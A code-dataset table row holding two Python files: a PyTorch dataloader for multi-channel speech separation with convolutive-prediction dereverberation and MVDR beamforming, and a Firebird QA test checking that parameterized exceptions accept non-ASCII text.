| hexsha stringlengths 40 40 | size int64 5 2.06M | ext stringclasses 10 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 3 248 | max_stars_repo_name stringlengths 5 125 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 248 | max_issues_repo_name stringlengths 5 125 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 3 248 | max_forks_repo_name stringlengths 5 125 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 5 2.06M | avg_line_length float64 1 1.02M | max_line_length int64 3 1.03M | alphanum_fraction float64 0 1 | count_classes int64 0 1.6M | score_classes float64 0 1 | count_generators int64 0 651k | score_generators float64 0 1 | count_decorators int64 0 990k | score_decorators float64 0 1 | count_async_functions int64 0 235k | score_async_functions float64 0 1 | count_documentation int64 0 1.04M | score_documentation float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
658173776bf6e1aa6395db9260e9462745880428 | 28,191 | py | Python | dataloader/data.py | yuhogun0908/Forward-Convolutive-Prediction | 11dea881b70daf45fa2c39883a601c613e2e53f2 | ["MIT"] | 3 | 2022-02-27T12:12:31.000Z | 2022-03-18T07:01:20.000Z | dataloader/data.py | ishine/Forward-Convolutive-Prediction | 11dea881b70daf45fa2c39883a601c613e2e53f2 | ["MIT"] | null | null | null | dataloader/data.py | ishine/Forward-Convolutive-Prediction | 11dea881b70daf45fa2c39883a601c613e2e53f2 | ["MIT"] | 1 | 2021-12-07T01:18:10.000Z | 2021-12-07T01:18:10.000Z |
import numpy as np
import os
import torch
import torch.utils.data as data
import pdb
import pickle
from pathlib import Path
from scipy import signal
import librosa
import scipy
from itertools import permutations
from numpy.linalg import solve
import numpy as np
import soundfile as sf
from convolutive_prediction import Apply_ConvolutivePrediction
class AudioDataset(data.Dataset):
def __init__(self,trainMode, functionMode, num_spks, num_ch, pickle_dir, ref_ch, model,device,cudaUse,check_audio,dereverb_Info,**STFT_args):
super(AudioDataset, self).__init__()
self.trainMode = trainMode
self.functionMode = functionMode
self.model = model
self.fs = STFT_args['fs']
self.window = STFT_args['window']
self.nperseg = STFT_args['length']
self.noverlap = STFT_args['overlap']
self.num_spks = num_spks
self.num_ch = num_ch
self.device = device
self.cudaUse = cudaUse
self.pickle_dir = list(Path(pickle_dir).glob('**/**/**/**/*.pickle'))
hann_win = scipy.signal.get_window('hann', self.nperseg)
self.scale = np.sqrt(1.0 / hann_win.sum()**2)
self.check_audio = check_audio
self.ref_ch = ref_ch
self.dereverb_flag = dereverb_Info[0]
self.predictionType = dereverb_Info[1]
self.tapDelay = dereverb_Info[2]
self.nTap = dereverb_Info[3]
self.reverb_variance_flowValue = dereverb_Info[4]
# self.pickle_dir = self.pickle_dir[0:10]
# # check chunked audio signal
# MAX_INT16 = np.iinfo(np.int16).max
# test= ref2 * MAX_INT16
# test = test.astype(np.int16)
# wf.write('sample_ref2.wav',16000,test)
def STFT(self,time_sig):
'''
input : [T,Nch]
output : [Nch,F,T]
'''
assert time_sig.shape[0] > time_sig.shape[1], "Please check the STFT input dimension, input = [T,Nch] "
num_ch = time_sig.shape[1]
for ch_idx in range(num_ch):  # iterate channels without shadowing num_ch
# scipy.signal.stft returns (freqs, times, Zxx) where Zxx is [F,T]
_,_,stft_ch = signal.stft(time_sig[:,ch_idx],fs=self.fs,window=self.window,nperseg=self.nperseg,noverlap=self.noverlap)
# output : [1,F,T]
stft_ch = np.expand_dims(stft_ch,axis=0)
if ch_idx == 0:
stft_chcat = stft_ch
else:
stft_chcat = np.append(stft_chcat,stft_ch,axis=0)
return stft_chcat
def __getitem__(self,index):
with open(self.pickle_dir[index], 'rb') as f:
data_infos = pickle.load(f)
f.close()
mix = data_infos['mix']
mix_stft = self.STFT(mix)
mix_stft = mix_stft/self.scale # scale equality between scipy stft and matlab stft
##################### Todo #########################################################################################################
###################### mix_stft, ref_stft, etc. should be circularly shifted so that the chosen reference channel comes first.
##############################################################################################################################
assert self.num_spks+1 == len(data_infos), "[ERROR] Check the number of speakers"
ref_stft = [[] for spk_idx in range(self.num_spks)]
for spk_idx in range(self.num_spks):
ref_sig = data_infos['ref'+str(spk_idx+1)]
if len(ref_sig.shape) == 1:
ref_sig = np.expand_dims(ref_sig,axis=1)
ref_stft[spk_idx] = torch.permute(torch.from_numpy(self.STFT(ref_sig)),[0,2,1])
ref_stft[spk_idx] = ref_stft[spk_idx]/self.scale # scale equality between scipy stft and matlab stft
# numpy to torch & reshape [C,F,T] -> [C,T,F]
mix_stft = torch.permute( torch.from_numpy(mix_stft),[0,2,1])
if self.functionMode == 'Separate':
"""
Output :
mix_stft : [Mic,T,F]
ref_stft : [Mic,T,F]
"""
# ref_stft is a Python list of per-speaker tensors, so roll each tensor individually
return torch.roll(mix_stft,-self.ref_ch,dims=0), [torch.roll(r,-self.ref_ch,dims=0) for r in ref_stft]
elif self.functionMode == 'Beamforming':
"""
Output :
mix_stft : [Mic,T,F]
ref_stft : [Mic,T,F]
"""
BeamOutSaveDir = str(self.pickle_dir[index]).replace('CleanMix','Beamforming')
MISO1OutSaveDir = str(self.pickle_dir[index]).replace('CleanMix','MISO1')
return mix_stft, ref_stft, BeamOutSaveDir, MISO1OutSaveDir
elif 'Enhance' in self.functionMode:
"""
Output :
mix_stft : [Mic,T,F]
ref_stft_1ch, list, [Mic,T,F]
MISO1_stft, list, [Mic,T,F]
Beamform_stft, list, [Mic,T,F]
"""
if len(mix_stft.shape)==3:
mix_stft = torch.unsqueeze(mix_stft,dim=0)
if self.cudaUse:
mix_stft = mix_stft.cuda(self.device)
ref_stft_1ch = [[] for _ in range(self.num_spks)]
for spk_idx in range(self.num_spks):
if len(ref_stft[spk_idx].shape) == 3:
ref_stft[spk_idx] = torch.unsqueeze(ref_stft[spk_idx], dim=0)
ref_stft_1ch[spk_idx] = ref_stft[spk_idx][:,self.ref_ch,:,:] # select reference mic channel
ref_stft_1ch[spk_idx] = torch.unsqueeze(ref_stft_1ch[spk_idx], dim=1)
B, Mic, T, F = mix_stft.size()
"""
Apply Source Separation
"""
if self.functionMode == 'Enhance_Load_MISO1_Output' or self.functionMode == 'Enhance_Load_MISO1_MVDR_Output':
MISO1OutSaveDir = str(self.pickle_dir[index]).replace('CleanMix','MISO1')
MISO1_stft = [[] for _ in range(self.num_spks)]
# Load MISO1 Output
for spk_idx in range(self.num_spks):
spk_name = '_s{}.wav'.format(spk_idx+1)
MISO1_sig, fs = librosa.load(MISO1OutSaveDir.replace('.pickle',spk_name), mono= False, sr= 8000)
if MISO1_sig.shape[1] != self.num_ch:
MISO1_sig = MISO1_sig.T
assert fs == self.fs, 'Check sampling rate'
if len(MISO1_sig.shape) == 1:
MISO1_sig = np.expand_dims(MISO1_sig, axis=1)
MISO1_stft[spk_idx] = torch.permute(torch.from_numpy(self.STFT(MISO1_sig)),[0,2,1])
MISO1_stft[spk_idx] = MISO1_stft[spk_idx]/self.scale
# MISO1_spk1 = torch.unsqueeze(MISO1_stft[0],dim=0)
# MISO1_spk2 = torch.unsqueeze(MISO1_stft[1],dim=0)
else:
MISO1_stft = self.MISO1_Inference(mix_stft, ref_ch = self.ref_ch)
if self.cudaUse:
mix_stft = mix_stft.detach().cpu()
for spk_idx in range(self.num_spks):
MISO1_stft[spk_idx] = MISO1_stft[spk_idx].detach().cpu()
"""
Source Alignment between Clean reference signal and MISO1 signal
calculate magnitude distance between ref mic(ch0) and target signal(reference mic : ch0)
"""
for spk_idx in range(self.num_spks):
if spk_idx == 0 :
ref_ = ref_stft_1ch[spk_idx]
s_MISO1 = MISO1_stft[spk_idx][:,0,:,:] # [B,T,F]
else:
ref_ = torch.cat((ref_,ref_stft_1ch[spk_idx]), dim=1)
s_MISO1 = torch.stack((s_MISO1, MISO1_stft[spk_idx][:,0,:,:]), dim=1)
s_MISO1_ = torch.unsqueeze(s_MISO1,dim=2) #[B,Spks,1,T,F]
magnitude_MISO1 = torch.abs(torch.sqrt(s_MISO1_.real**2 + s_MISO1_.imag**2)) #[B,Spks,1,T,F]
s_ref = torch.unsqueeze(ref_, dim=1)
magnitude_distance = torch.sum(torch.abs(magnitude_MISO1 - abs(s_ref)),[3,4])
perms = ref_.new_tensor(list(permutations(range(self.num_spks))), dtype=torch.long) #[[0,1],[1,0]]
index_ = torch.unsqueeze(perms, dim=2)
perms_one_hot = ref_.new_zeros((*perms.size(), self.num_spks), dtype=torch.float).scatter_(2,index_,1)
batchwise_distance = torch.einsum('bij,pij->bp',[magnitude_distance, perms_one_hot])
min_distance_idx = torch.argmin(batchwise_distance, dim=1)
for batch_idx in range(B):
align_index = torch.argmax(perms_one_hot[min_distance_idx[batch_idx]], dim=1)
for spk_idx in range(self.num_spks):
target_index = align_index[spk_idx]
ref_stft_1ch[spk_idx] = torch.unsqueeze(ref_[batch_idx,target_index,...],dim=0)
"""
Apply Dereverberation Method
1. WPE : weighted prediction error
2. ICP : inverse convolutive prediction
3. FCP : forward convolutive prediction
4. cFCP : combine forward convolutive prediction
"""
if self.dereverb_flag :
dereverb_stft = [[] for _ in range(self.num_spks)]
observe = torch.permute(mix_stft,[0,3,1,2]).detach().cpu().numpy()
if self.predictionType == 'cFCP':
source = [torch.permute(MISO1_stft[spk_idx],[0,3,1,2]).numpy() for spk_idx in range(self.num_spks)]
dereverb_stft = Apply_ConvolutivePrediction(observe,source,self.num_spks,self.predictionType,self.tapDelay,self.nTap,self.reverb_variance_flowValue)
elif self.predictionType == 'test':
source = [torch.permute(MISO1_stft[spk_idx],[0,3,1,2]).numpy() for spk_idx in range(self.num_spks)]
dereverb_stft = Apply_ConvolutivePrediction(observe,source,self.num_spks,self.predictionType,self.tapDelay,self.nTap,self.reverb_variance_flowValue)
else:
for spk_idx in range(self.num_spks):
source = torch.permute(MISO1_stft[spk_idx],[0,3,1,2]).numpy()
observe = torch.permute(mix_stft,[0,3,1,2]).detach().cpu().numpy()
dereverb_stft[spk_idx] = Apply_ConvolutivePrediction(observe,source,self.num_spks,self.predictionType,self.tapDelay,self.nTap,self.reverb_variance_flowValue)
#################################
########### Testcode ###########
#################################
# WPE
DNN_WPE_dereverb_stft = [[] for _ in range(self.num_spks)]
FCP_dereverb_stft = [[] for _ in range(self.num_spks)]
for spk_idx in range(self.num_spks):
source = torch.permute(MISO1_stft[spk_idx],[0,3,1,2]).numpy()
observe = torch.permute(mix_stft,[0,3,1,2]).detach().cpu().numpy()
DNN_WPE_dereverb_stft[spk_idx] = Apply_ConvolutivePrediction(observe,source,self.num_spks,'DNN_WPE',self.tapDelay,self.nTap,self.reverb_variance_flowValue)
# FCP
source = torch.permute(MISO1_stft[spk_idx],[0,3,1,2]).numpy()
observe = torch.permute(mix_stft,[0,3,1,2]).detach().cpu().numpy()
FCP_dereverb_stft[spk_idx] = Apply_ConvolutivePrediction(observe,source,self.num_spks,'FCP',self.tapDelay,self.nTap,self.reverb_variance_flowValue)
#################################
########### Testcode ###########
#################################
"""
Apply MVDR Beamforming
"""
if self.functionMode == 'Enhance_Load_MVDR_Output' or self.functionMode == 'Enhance_Load_MISO1_MVDR_Output':
BeamformSaveDir = str(self.pickle_dir[index]).replace('CleanMix','Beamforming')
Beamform_stft = [[] for _ in range(self.num_spks)]
# Load MISO1 Output
for spk_idx in range(self.num_spks):
spk_name = '_s{}.wav'.format(spk_idx+1)
Beamform_sig, fs = librosa.load(BeamformSaveDir.replace('.pickle',spk_name), mono= False, sr= 8000)
if len(Beamform_sig.shape) == 1:
Beamform_sig = np.expand_dims(Beamform_sig, axis=1)
assert fs == self.fs, 'Check sampling rate'
Beamform_stft[spk_idx] = torch.permute(torch.from_numpy(self.STFT(Beamform_sig)),[0,2,1])
Beamform_stft[spk_idx] = Beamform_stft[spk_idx]/self.scale
else:
Beamform_stft = [[] for _ in range(self.num_spks)]
for spk_idx in range(self.num_spks):
source = torch.permute(MISO1_stft[spk_idx],[0,3,1,2]).numpy()
if self.dereverb_flag :
observe = torch.permute(dereverb_stft[spk_idx],[0,3,1,2])
else:
observe = torch.permute(mix_stft,[0,3,1,2]).detach().cpu()
Beamform_stft[spk_idx] = self.Apply_Beamforming(source, observe)
#################################
########### Testcode ###########
#################################
DNN_WPE_Beamform_stft = [[] for _ in range(self.num_spks)]
for spk_idx in range(self.num_spks):
source = torch.permute(MISO1_stft[spk_idx],[0,3,1,2]).numpy()
observe = torch.permute(DNN_WPE_dereverb_stft[spk_idx],[0,3,1,2])
DNN_WPE_Beamform_stft[spk_idx] = self.Apply_Beamforming(source, observe)
FCP_Beamform_stft = [[] for _ in range(self.num_spks)]
for spk_idx in range(self.num_spks):
source = torch.permute(MISO1_stft[spk_idx],[0,3,1,2]).numpy()
observe = torch.permute(FCP_dereverb_stft[spk_idx],[0,3,1,2])
FCP_Beamform_stft[spk_idx] = self.Apply_Beamforming(source, observe)
Origin_Beamform_stft = [[] for _ in range(self.num_spks)]
for spk_idx in range(self.num_spks):
source = torch.permute(MISO1_stft[spk_idx],[0,3,1,2]).numpy()
observe = torch.permute(mix_stft,[0,3,1,2])
Origin_Beamform_stft[spk_idx] = self.Apply_Beamforming(source, observe)
#################################
########### Testcode ###########
#################################
if len(mix_stft.shape)== 4:
mix_stft = torch.squeeze(mix_stft)
for spk_idx in range(self.num_spks):
if len(MISO1_stft[spk_idx].shape)== 4:
MISO1_stft[spk_idx] = torch.squeeze(MISO1_stft[spk_idx])
if len(dereverb_stft[spk_idx].shape)==4:
dereverb_stft[spk_idx] = torch.squeeze(dereverb_stft[spk_idx])
if self.check_audio:
''' Check the result of MISO1 '''
self.save_audio(np.transpose(mix_stft, [0,2,1]), 'mix')
for spk_idx in range(self.num_spks):
self.save_audio(np.transpose(ref_stft_1ch[spk_idx], [0,2,1]), 'ref_s{}'.format(spk_idx))
self.save_audio(np.transpose(MISO1_stft[spk_idx], [0,2,1]), 'MISO1_s{}'.format(spk_idx))
if self.dereverb_flag:
self.save_audio(np.transpose(dereverb_stft[spk_idx], [0,2,1]), self.predictionType+'_s{}'.format(spk_idx))
self.save_audio(np.transpose(Beamform_stft[spk_idx], [0,2,1]), self.predictionType+'_Beamform_s{}'.format(spk_idx))
else:
self.save_audio(np.transpose(Beamform_stft[spk_idx], [0,2,1]), 'Beamform_s{}'.format(spk_idx))
#################################
########### Testcode ###########
#################################
#WPE
self.save_audio(np.transpose(np.squeeze(DNN_WPE_dereverb_stft[spk_idx],axis=0), [0,2,1]), 'DNN_WPE_s{}'.format(spk_idx))
self.save_audio(np.transpose(DNN_WPE_Beamform_stft[spk_idx], [0,2,1]), 'DNN_WPE_Beamform_s{}'.format(spk_idx))
#FCP
self.save_audio(np.transpose(np.squeeze(FCP_dereverb_stft[spk_idx],axis=0), [0,2,1]), 'FCP_s{}'.format(spk_idx))
self.save_audio(np.transpose(FCP_Beamform_stft[spk_idx], [0,2,1]), 'FCP_Beamform_s{}'.format(spk_idx))
#Origin Beamforming
self.save_audio(np.transpose(Origin_Beamform_stft[spk_idx], [0,2,1]), 'Origin_Beamform_s{}'.format(spk_idx))
#################################
########### Testcode ###########
#################################
pdb.set_trace()
return mix_stft, ref_stft_1ch, MISO1_stft, Beamform_stft
else:
raise ValueError('[Error] Choose correct train mode')
def save_audio(self,signal, wavname):
'''
Input:
signal : [Ch,F,T]
wavename : str, wav name to save
'''
hann_win = scipy.signal.get_window(self.window, self.nperseg)
scale = np.sqrt(1.0 / hann_win.sum()**2)
MAX_INT16 = np.iinfo(np.int16).max
signal = signal * scale
t_sig = self.ISTFT(signal)
t_sig= t_sig * MAX_INT16
t_sig = t_sig.astype(np.int16)
sf.write('{}.wav'.format(wavname),t_sig.T, self.fs,'PCM_24')
def ISTFT(self,FT_sig):
'''
input : [F,T]
output : [T,C]
'''
# if FT_sig.shape[1] != self.config['ISTFT']['length']+1:
# FT_sig = np.transpose(FT_sig,(0,1)) # [C,T,F] -> [C,F,T]
_, t_sig = signal.istft(FT_sig,fs=self.fs, window=self.window, nperseg=self.nperseg, noverlap=self.noverlap) #[C,F,T] -> [T,C]
return t_sig
def MISO1_Inference(self,mix_stft,ref_ch=0):
"""
Input:
mix_stft : observe STFT, size - [B, Mic, T, F]
Output:
MISO1_stft : list of separated source, - [B, reference Mic, T, F]
1. Circularly shift the microphone array at run time for the prediction of each microphone signal.
If the microphones are arranged uniformly on a circle, select the reference microphone by circularly shifting the array, e.g. reference mic q -> [Yq, Yq+1, ..., Yp, Y1, ..., Yq-1]
2. Use a permutation-invariant alignment method to match the clean target signal and the estimated signal.
"""
B, M, T, F = mix_stft.size()
MISO1_stft = [torch.empty(B,M,T,F, dtype=torch.complex64) for _ in range(self.num_spks)]
Mic_array = [x for x in range(M)]
Mic_array = np.roll(Mic_array, -ref_ch) # [ref_ch, ref_ch+1, ..., 0, 1, ..., ref_ch-1]
# print('Mic_array : ', Mic_array)
with torch.no_grad():
mix_stft_refCh = torch.roll(mix_stft,-ref_ch, dims=1)
MISO1_refCh = self.model(mix_stft_refCh)
for spk_idx in range(self.num_spks):
MISO1_stft[spk_idx][:,ref_ch,...] = MISO1_refCh[:,spk_idx,...]
# MISO1_spk1[:,ref_ch,...] = MISO1_refCh[:,0,...]
# MISO1_spk2[:,ref_ch,...] = MISO1_refCh[:,1,...]
s_MISO1_refCh = torch.unsqueeze(MISO1_refCh, dim=2)
s_Magnitude_refCh = torch.abs(torch.sqrt(s_MISO1_refCh.real**2 + s_MISO1_refCh.imag**2)) # [B,Spks,1,T,F]
with torch.no_grad():
for shiftIdx in Mic_array[1:]:
# print('shift Micnumber', shiftIdx)
mix_stft_shift = torch.roll(mix_stft,-shiftIdx, dims=1)
MISO1_chShift = self.model(mix_stft_shift)
s_MISO1_chShift = torch.unsqueeze(MISO1_chShift, dim=1) #[B,1,Spks,T,F]
s_magnitude_chShift = torch.sum(torch.abs(s_Magnitude_refCh - abs(s_MISO1_chShift)),[3,4]) #[B,Spks,Spks,T,F]
perms = MISO1_chShift.new_tensor(list(permutations(range(self.num_spks))), dtype=torch.long)
index_ = torch.unsqueeze(perms, dim=2)
perms_one_hot = MISO1_chShift.new_zeros((*perms.size(), self.num_spks), dtype=torch.float).scatter_(2,index_,1)
batchwise_distance = torch.einsum('bij,pij->bp', [s_magnitude_chShift, perms_one_hot])
min_distance_idx = torch.argmin(batchwise_distance,dim=1)
for batch_idx in range(B):
align_index = torch.argmax(perms_one_hot[min_distance_idx[batch_idx]],dim=1)
for spk_idx in range(self.num_spks):
target_index = align_index[spk_idx]
MISO1_stft[spk_idx][:,shiftIdx,...] = MISO1_chShift[batch_idx,target_index,...]
return MISO1_stft
def Apply_Beamforming(self, source_stft, mix_stft, epsi=1e-6):
"""
Input :
mix_stft : observe STFT, size - [B, F, Ch, T], np.ndarray
source_stft : estimated source STFT, size - [B, F, Ch, T], np.ndarray
Output :
Beamform_stft : MVDR Beamforming output, size - [B, 1, T, F], np.ndarray
1. estimate target steering using EigenValue decomposition
2. get source, noise Spatial Covariance Matrix, S = 1/T * xx_h
3. MVDR Beamformer
"""
B, F, M, T = source_stft.shape
# Apply small Diagonal matrix to prevent matrix inversion error
eye = np.eye(M)
eye = eye.reshape(1,1,M,M)
delta = epsi * np.tile(eye,[B,F,1,1])
''' Source '''
source_SCM = self.get_spatial_covariance_matrix(source_stft,normalize=True) # target covariance matrix, size : [B,F,C,C]
source_SCM = 0.5 * (source_SCM + np.conj(source_SCM.swapaxes(-1,-2))) # verify hermitian symmetric
''' Noise Spatial Covariance '''
noise_signal = mix_stft - source_stft
# s1_noise_signal = mix_stft #MPDR
noise_SCM = self.get_spatial_covariance_matrix(noise_signal,normalize = True) # noise covariance matrix, size : [B,F,C,C]
# s1_SCMn = self.condition_covariance(s1_SCMn, 1e-6)
# s1_SCMn /= np.trace(s1_SCMn, axis1=-2, axis2= -1)[...,None, None]
noise_SCM = 0.5 * (noise_SCM + np.conj(noise_SCM.swapaxes(-1,-2))) # verify hermitian symmetric
''' Get Steering vector : Eigen-decomposition '''
shape = source_SCM.shape
source_steering = np.empty(shape[:-1], dtype=complex)  # np.complex is deprecated; use the builtin complex
# s1_SCMs += delta
source_SCM = np.reshape(source_SCM, (-1,) + shape[-2:])
eigenvals, eigenvecs = np.linalg.eigh(source_SCM)
# Find max eigenvals
vals = np.argmax(eigenvals, axis=-1)
# Select eigenvec for max eigenval
source_steering = np.array([eigenvecs[i,:,vals[i]] for i in range(eigenvals.shape[0])])
# s1_steering = np.array([eigenvecs[i,:,vals[i]] * np.sqrt(Mic/np.linalg.norm(eigenvecs[i,:,vals[i]])) for i in range(eigenvals.shape[0])]) # [B*F,Ch,Ch]
source_steering = np.reshape(source_steering, shape[:-1]) # [B,F,Ch]
source_SCM = np.reshape(source_SCM, shape)
''' steering normalize with respect to the reference microphone '''
# ver 1
source_steering = source_steering / np.expand_dims(source_steering[:,:,0], axis=2)
for b_idx in range(0,B):
for f_idx in range(0,F):
# s1_steering[b_idx,f_idx,:] = s1_steering[b_idx,f_idx,:] / s1_steering[b_idx,f_idx,0]
source_steering[b_idx,f_idx,:] = source_steering[b_idx,f_idx,:] * np.sqrt(M/(np.linalg.norm(source_steering[b_idx,f_idx,:])))
# ver 2
# s1_steering = self.normalize(s1_steering)
source_steering = self.PhaseCorrection(source_steering)
beamformer = self.get_mvdr_beamformer(source_steering, noise_SCM, delta)
# s1_beamformer = self.blind_analytic_normalization(s1_beamformer,s1_SCMn)
source_bf = self.apply_beamformer(beamformer,mix_stft)
source_bf = torch.permute(torch.from_numpy(source_bf), [0,2,1])
return source_bf
def get_spatial_covariance_matrix(self,observation,normalize):
'''
Input :
observation : complex
size : [B,F,C,T]
Return :
R : double
size : [B,F,C,C]
'''
B,F,C,T = observation.shape
R = np.einsum('...dt,...et-> ...de', observation, observation.conj())
if normalize:
normalization = np.sum(np.ones((B,F,1,T)),axis=-1, keepdims=True)
R /= normalization
return R
def PhaseCorrection(self,W): # same as the Matlab implementation
"""
Phase correction to reduce distortions due to phase inconsistencies.
Input:
W : steering vector
size : [B,F,Ch]
"""
w = W.copy()
B, F, Ch = w.shape
for b_idx in range(0,B):
for f in range(1, F):
w[b_idx,f, :] *= np.exp(-1j*np.angle(
np.sum(w[b_idx,f, :] * w[b_idx,f-1, :].conj(), axis=-1, keepdims=True)))
return w
def condition_covariance(self,x,gamma):
"""see https://stt.msu.edu/users/mauryaas/Ashwini_JPEN.pdf (2.3)"""
B,F,_,_ = x.shape
for b_idx in range(0,B):
scale = gamma * np.trace(x[b_idx,...]) / x[b_idx,...].shape[-1]
scaled_eye = np.eye(x.shape[-1]) * scale
x[b_idx,...] = (x[b_idx,...]+scaled_eye) / (1+gamma)
return x
def normalize(self,vector):
B,F,Ch = vector.shape
for b_idx in range(0,B):
for ii in range(0,F):
weight = np.matmul(np.conjugate(vector[b_idx,ii,:]).reshape(1,-1), vector[b_idx,ii,:])
vector[b_idx,ii,:] = (vector[b_idx,ii,:] / weight)
return vector
def blind_analytic_normalization(self,vector, noise_psd_matrix, eps=0):
"""Reduces distortions in beamformed ouptput.
:param vector: Beamforming vector
with shape (..., sensors)
:param noise_psd_matrix:
with shape (..., sensors, sensors)
:return: Scaled beamforming vector
with shape (..., sensors)
"""
nominator = np.einsum(
'...a,...ab,...bc,...c->...',
vector.conj(), noise_psd_matrix, noise_psd_matrix, vector
)
nominator = np.abs(np.sqrt(nominator))
denominator = np.einsum(
'...a,...ab,...b->...', vector.conj(), noise_psd_matrix, vector
)
denominator = np.abs(denominator)
normalization = nominator / (denominator + eps)
return vector * normalization[..., np.newaxis]
def get_mvdr_beamformer(self, steering_vector, R_noise, delta):
"""
Returns the MVDR beamformers vector
Input :
steering_vector : Acoustic transfer function vector
shape : [B, F, Ch]
R_noise : Noise spatial covariance matrix
shape : [B, F, Ch, Ch]
"""
R_noise += delta
numer = solve(R_noise, steering_vector)
denom = np.einsum('...d,...d->...', steering_vector.conj(), numer)
beamformer = numer / np.expand_dims(denom, axis=-1)
return beamformer
def apply_beamformer(self, beamformer, mixture):
return np.einsum('...a,...at->...t',beamformer.conj(), mixture)
def __len__(self):
return len(self.pickle_dir)
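# ----------------------------------------------------------------------
# Minimal, self-contained sketch (not part of the original dataloader) of the
# MVDR recipe used by Apply_Beamforming above: spatial covariance matrices ->
# steering vector via eigen-decomposition -> MVDR weights -> beamformed output.
# All shapes and the synthetic signals below are illustrative assumptions only.
if __name__ == "__main__":
    import numpy as np
    from numpy.linalg import solve

    rng = np.random.default_rng(0)
    B, F, C, T = 1, 4, 3, 32                      # batch, freq bins, mics, frames (assumed)
    src = rng.normal(size=(B, F, C, T)) + 1j * rng.normal(size=(B, F, C, T))
    noise = 0.1 * (rng.normal(size=(B, F, C, T)) + 1j * rng.normal(size=(B, F, C, T)))
    mix = src + noise

    def scm(x):
        # spatial covariance matrix, [B,F,C,C] = X X^H / T
        return np.einsum('bfct,bfdt->bfcd', x, x.conj()) / x.shape[-1]

    R_s, R_n = scm(src), scm(noise)
    _, vecs = np.linalg.eigh(R_s)                 # eigenvalues in ascending order
    steer = vecs[..., -1]                         # principal eigenvector, [B,F,C]
    steer = steer / steer[..., :1]                # normalize w.r.t. reference mic 0

    eye = np.eye(C)[None, None]                   # diagonal loading for a stable inverse
    numer = solve(R_n + 1e-6 * eye, steer[..., None])[..., 0]
    w = numer / np.einsum('bfc,bfc->bf', steer.conj(), numer)[..., None]
    out = np.einsum('bfc,bfct->bft', w.conj(), mix)   # beamformed output, [B,F,T]
    print(out.shape)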
| 47.943878 | 196 | 0.545564 | 27,862 | 0.987559 | 0 | 0 | 0 | 0 | 0 | 0 | 7,428 | 0.263283 |
6582ec795f9be718fba1c563c5c66e44261c6ce1 | 3,053 | py | Python | tests/bugs/core_4160_test.py | reevespaul/firebird-qa | 98f16f425aa9ab8ee63b86172f959d63a2d76f21 | ["MIT"] | null | null | null | tests/bugs/core_4160_test.py | reevespaul/firebird-qa | 98f16f425aa9ab8ee63b86172f959d63a2d76f21 | ["MIT"] | null | null | null | tests/bugs/core_4160_test.py | reevespaul/firebird-qa | 98f16f425aa9ab8ee63b86172f959d63a2d76f21 | ["MIT"] | null | null | null |
#coding:utf-8
#
# id: bugs.core_4160
# title: Parameterized exception does not accept not ASCII characters as parameter
# description:
# tracker_id: CORE-4160
# min_versions: ['3.0']
# versions: 3.0
# qmid: None
import pytest
from firebird.qa import db_factory, isql_act, Action
# version: 3.0
# resources: None
substitutions_1 = [('-At procedure.*', '')]
init_script_1 = """
create or alter procedure sp_alert(a_lang char(2), a_new_amount int) as begin end;
commit;
recreate exception ex_negative_remainder ' @1 (@2)';
commit;
"""
db_1 = db_factory(page_size=4096, charset='UTF8', sql_dialect=3, init=init_script_1)
test_script_1 = """
set term ^;
create or alter procedure sp_alert(a_lang char(2), a_new_amount int) as
begin
if (a_lang = 'cz') then
exception ex_negative_remainder using ('Czech: New Balance bude menší než nula', a_new_amount);
else if (a_lang = 'pt') then
exception ex_negative_remainder using ('Portuguese: New saldo será menor do que zero', a_new_amount);
else if (a_lang = 'dm') then
exception ex_negative_remainder using ('Danish: New Balance vil være mindre end nul', a_new_amount);
else if (a_lang = 'gc') then
exception ex_negative_remainder using ('Greek: Νέα ισορροπία θα είναι κάτω από το μηδέν', a_new_amount);
else if (a_lang = 'fr') then
exception ex_negative_remainder using ('French: Nouveau solde sera inférieur à zéro', a_new_amount);
else
exception ex_negative_remainder using ('Russian: Новый остаток будет меньше нуля', a_new_amount);
end
^
set term ;^
commit;
execute procedure sp_alert('cz', -1);
execute procedure sp_alert('pt', -2);
execute procedure sp_alert('dm', -3);
execute procedure sp_alert('gc', -4);
execute procedure sp_alert('fr', -5);
execute procedure sp_alert('jp', -6);
"""
act_1 = isql_act('db_1', test_script_1, substitutions=substitutions_1)
expected_stderr_1 = """
Statement failed, SQLSTATE = HY000
exception 1
-EX_NEGATIVE_REMAINDER
- Czech: New Balance bude menší než nula (-1)
Statement failed, SQLSTATE = HY000
exception 1
-EX_NEGATIVE_REMAINDER
- Portuguese: New saldo será menor do que zero (-2)
Statement failed, SQLSTATE = HY000
exception 1
-EX_NEGATIVE_REMAINDER
- Danish: New Balance vil være mindre end nul (-3)
Statement failed, SQLSTATE = HY000
exception 1
-EX_NEGATIVE_REMAINDER
- Greek: Νέα ισορροπία θα είναι κάτω από το μηδέν (-4)
Statement failed, SQLSTATE = HY000
exception 1
-EX_NEGATIVE_REMAINDER
- French: Nouveau solde sera inférieur à zéro (-5)
Statement failed, SQLSTATE = HY000
exception 1
-EX_NEGATIVE_REMAINDER
- Russian: Новый остаток будет меньше нуля (-6)
"""
@pytest.mark.version('>=3.0')
def test_1(act_1: Action):
act_1.expected_stderr = expected_stderr_1
act_1.execute()
assert act_1.clean_expected_stderr == act_1.clean_stderr
| 31.802083 | 113 | 0.681625 | 0 | 0 | 0 | 0 | 183 | 0.057385 | 0 | 0 | 2,700 | 0.84666 |
